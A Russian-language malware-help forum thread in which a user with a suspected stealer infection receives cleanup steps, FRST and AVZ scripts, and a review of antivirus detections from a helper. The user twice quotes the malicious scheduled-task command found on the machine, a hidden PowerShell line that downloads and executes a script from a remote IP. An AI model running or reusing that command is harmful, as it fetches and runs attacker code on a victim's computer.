Подозрение на стиллер

**ditresh60** · 05.06.2025, 12:15

Добрый день!
Прошу вас помочь вылечить компьютер и, по возможности, выяснить источник заражения:

Сегодня с утра ноутбук не дал пользователю открыть ни одно приложение. Кнопки мыши не работали, кнопки тачпада тоже. Интерфейс должным образом не реагировал
В планировщике задач нашлась задача с действием (сейчас удалена):
-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.242/0x55/3')"

Кроме того на флешке, подключенной к компьютеру создался файл comment.htt , который определился защитником, как вирус.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 05.06.2025, 12:16

Уважаемый(ая) ditresh60, спасибо за обращение на наш форум!

Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

**ditresh60** · 05.06.2025, 12:18

Кроме того, забыл дополнить. В исключения Защитника были добавлены типы файлов .jpg, .scr и еще какой-то. Точно уже не скажу

**Vvvyg** · 05.06.2025, 22:19

Некорректно собирать логи во время работы Dr. Web CureIt. что-то будет заблокировано в это время для проверки AVZ и прочих утилит, что-то из угроз будет удалено в процессе лечения. Но по логам ничего подозрительного не вижу.

Прикрепите упакованными в архив файлы отчёта report_<дата>_*.klr.enc1 из папки C:\KVRT2020_Data.

Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать.

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**ditresh60** · 06.06.2025, 09:31

Архивы во вложении

**Vvvyg** · 06.06.2025, 13:03

Выделите и скопируйте в буфер обмена следующий код:

Код:

Start::
CloseProcesses:
CreateRestorePoint:
FirewallRules: [{FA4B5A18-7119-483F-9E80-4F717CC2F89F}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe => Нет файла
FirewallRules: [{70AAA2EC-3752-4D8E-8730-000C5AC90A1A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe => Нет файла
HKLM-x32\...\Run: [] => [X]
FirewallRules: [{FE7ECA6C-D294-42D9-9B60-FEEB64C6A697}] => (Allow) C:\Windows\twain_32\Xerox\WC3315\SCNSearch\USDAgent.exe => Нет файла
FirewallRules: [{1BFC13C2-F420-4842-AC41-D2BEBDB3AFBC}] => (Allow) C:\Windows\twain_32\Xerox\WC3315\SCNSearch\USDAgent.exe => Нет файла
FirewallRules: [{29BDDE5B-588E-4C8C-9CC3-159F02C13CFD}] => (Allow) C:\Program Files (x86)\Xerox\Scan Assistant\USDAgent.exe => Нет файла
FirewallRules: [{7ECA9C77-CF92-465C-824C-6BEB9E2D9EBA}] => (Allow) C:\Program Files (x86)\Xerox\Scan Assistant\USDAgent.exe => Нет файла
FirewallRules: [TCP Query User{116BD320-C909-4CB4-8E38-543744C398C8}C:\users\annal\desktop\старые удаленки\anydesk.exe] => (Allow) C:\users\annal\desktop\старые удаленки\anydesk.exe => Нет файла
FirewallRules: [UDP Query User{131C4D67-CFAB-47BB-8409-8B05DB478997}C:\users\annal\desktop\старые удаленки\anydesk.exe] => (Allow) C:\users\annal\desktop\старые удаленки\anydesk.exe => Нет файла
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
StartBatch:
del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Js\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cache\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\Js\*.*" >nul
del /s /q C:\Windows\Temp\*.* >nul
del /s /q "%userprofile%\AppData\Local\temp\*.*" >nul
del /s /q C:\Windows\Minidump\*.dmp >nul
ipconfig /flushdns
sfc /scannow
endbatch:
Reboot:
End::

Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Вставлять код никуда не нужно, программа возьмёт его из буфера обмена. Будет создан лог-файл (Fixlog.txt), прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен.

Судя по детекту KVRT - E:\comment.htt" Info="Trojan.VBS.Starter.a - вирус был на флэшке, она и могла быть источником. После зачистки Dr. Web CureIt. и KVRT, да ещё и при установленном Malwarebytes источник, боюсь, мы уже не установим.
При установке этих ломанных программ всё, что угодно могли подцепить:

Date: 2025-06-05 15:29:03
Description:
Программа Антивирусная программа Microsoft Defender обнаружила вредоносные или другие потенциально нежелательные программы.
Чтобы узнать больше, см. приведенные далее сведения.
https://go.microsoft.com/fwlink/?lin...3&enterprise=0
Имя: HackTool:Win32/Crack!MTB
ИД: 2147745913
Серьезность: Высокий
Категория: Программное средство
Путь: containerfile:_D:\SOFT\Adobe Illustrator 2024 28.4.1.86 RePack by KpoJIuK.exe; containerfile:_D:\SOFT\Adobe Photoshop 2024 25.6.0.433 RePack by KpoJIuK.exe; file:_D:\SOFT\Adobe Illustrator 2024 28.4.1.86 RePack by KpoJIuK.exe->(RarSfx)->Illustrator2024x64\install\Helper.exe; file:_D:\SOFT\Adobe Photoshop 2024 25.6.0.433 RePack by KpoJIuK.exe->(RarSfx)->Photoshop2024\install\Helper.exe
Начало обнаружения: Локальный компьютер
Тип обнаружения: Конкретный
Источник обнаружения: Пользователь
Пользователь: DESKTOP-P22VHN3\annal
Название процесса: Unknown
Версия службы анализа безопасности: AV: 1.429.360.0, AS: 1.429.360.0, NIS: 1.429.360.0
Версия подсистемы: AM: 1.1.25040.1, NIS: 1.1.25040.1

Date: 2025-06-05 15:29:03
Description:
Программа Антивирусная программа Microsoft Defender обнаружила вредоносные или другие потенциально нежелательные программы.
Чтобы узнать больше, см. приведенные далее сведения.
https://go.microsoft.com/fwlink/?lin...3&enterprise=0
Имя: PUADlManager:Win32/OpenDownloadManager
ИД: 312003
Серьезность: Низкий
Категория: Нежелательная программа
Путь: file:_D:\SOFT\Adobe Photoshop CC 2018 (19.0.1) x86-x64 RePack by D!akov.exe
Начало обнаружения: Локальный компьютер
Тип обнаружения: Конкретный
Источник обнаружения: Пользователь
Пользователь: DESKTOP-P22VHN3\annal
Название процесса: Unknown
Версия службы анализа безопасности: AV: 1.429.360.0, AS: 1.429.360.0, NIS: 1.429.360.0
Версия подсистемы: AM: 1.1.25040.1, NIS: 1.1.25040.1

**ditresh60** · 09.06.2025, 09:25

Указанные вами действия выполнил. Файл во вложении.

Дополню подробностями.
Изначально происходило следующим образом:
- При включении компьютер имитирован нажатия клавиш мышки случайным образом, клавиатура не работала.
- Был выключен интернет.
- Через некоторое время компьютер стал работать в штатном режиме.
- В Защитнике в исключениях были обнаружены добавленные расширения .jpg и д.р
- Эти расширения были оттуда удалены
- В планировщике задач была обнаружена задача -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.242/0x55/3')"
- Задача была удалена
- Включен режим отображения скрытых и защищенных файлов в папках
- В компьютер была воткнута отформатированная флешка с файлом антивируса kvrt
- На флешке в корне через некоторое время появился файл comment.htt
- Я проверил флешку на вирусы, файл пометился как троян. Файл был удален.
- Повторная проверка флешки - вирусов больше не показала.
- Ноутбук был проверен тремя антивирусными программами KVRT, DrWeb Cureit, malwarebytes. По итогу удалил все что нашло.

Все это происходило с 5 по 6.06

Сегодня утром 9.06 вновь стали блокироваться и мышь, началась имитация нажатий кнопок (мышка физически отключена). Через примерно 10 минут после отключения интернета все прекратилось.

**Vvvyg** · 09.06.2025, 17:18

Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:

Код:

begin
 ExecuteFile('wevtutil.exe', 'epl System system.evtx', 0, 200000, false);
 ExecuteFile('wevtutil.exe', 'epl Application Application.evtx', 0, 200000, false);
 ExecuteFile('wevtutil.exe', 'epl Security Security.evtx', 0, 200000, false);
 ExecuteFile('wevtutil.exe', 'epl "Microsoft-Windows-Windows Defender/Operational" wd.evtx "/q:*[System[(EventID=1116)]]"', 0, 200000, false);
 ExecuteFile('wevtutil.exe', 'epl "Microsoft-Windows-PowerShell/Operational" "Windows PowerShell.evtx"', 0, 200000, false);
 ExecuteFile(GetAVZDirectory+'7za.exe', 'a -t7z -sdel -mx9 -m0=lzma:lp=1:lc=0:d=128m Events.7z *.evtx', 1, 300000, false);
ExitAVZ;
end.

В папке с AVZ появится архив Events.7z, загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку в теме.

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

**ditresh60** · 10.06.2025, 09:17

Ссылка на архив Events.7z:
https://cloud.mail.ru/public/m1Xy/sYpNnWtXi

**Vvvyg** · 10.06.2025, 22:08

Ничего подозрительного, ни в образе автозапуска, ни в журналах за 9-10.06.

Подозрение на стиллер (заявка № 229706)

Опции темы